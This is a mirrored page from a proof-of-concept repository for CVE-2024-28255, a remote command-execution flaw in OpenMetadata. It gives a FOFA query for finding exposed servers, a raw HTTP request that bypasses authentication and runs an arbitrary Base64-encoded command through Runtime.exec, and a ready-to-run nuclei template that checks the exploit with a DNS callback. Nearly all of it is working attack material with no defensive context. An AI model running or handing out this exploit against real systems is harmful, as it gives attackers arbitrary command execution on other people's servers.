mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
54 lines
1.4 KiB
Markdown
54 lines
1.4 KiB
Markdown
## OpenMetadata命令执行(CVE-2024-28255)
|
|
|
|
## fofa
|
|
```
|
|
icon_hash="733091897"
|
|
```
|
|
|
|
## poc
|
|
```
|
|
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
|
|
Host: your-ip
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
|
|
Connection: close
|
|
Accept-Encoding: gzip
|
|
```
|
|
|
|
|
|
|
|
|
|
## nuclei POC
|
|
```
|
|
id: CVE-2024-28255
|
|
|
|
info:
|
|
name: CVE-2024-28255
|
|
author: xiaoming
|
|
severity: high
|
|
description: OpenMetadata Command Execution
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: ""
|
|
verified: true
|
|
|
|
http:
|
|
- raw:
|
|
- |+
|
|
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
|
|
Connection: close
|
|
Accept-Encoding: gzip
|
|
|
|
redirects: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- id: 1
|
|
type: word
|
|
part: body
|
|
words:
|
|
- "400"
|
|
- java.lang.ProcessImpl
|
|
condition: and
|
|
```
|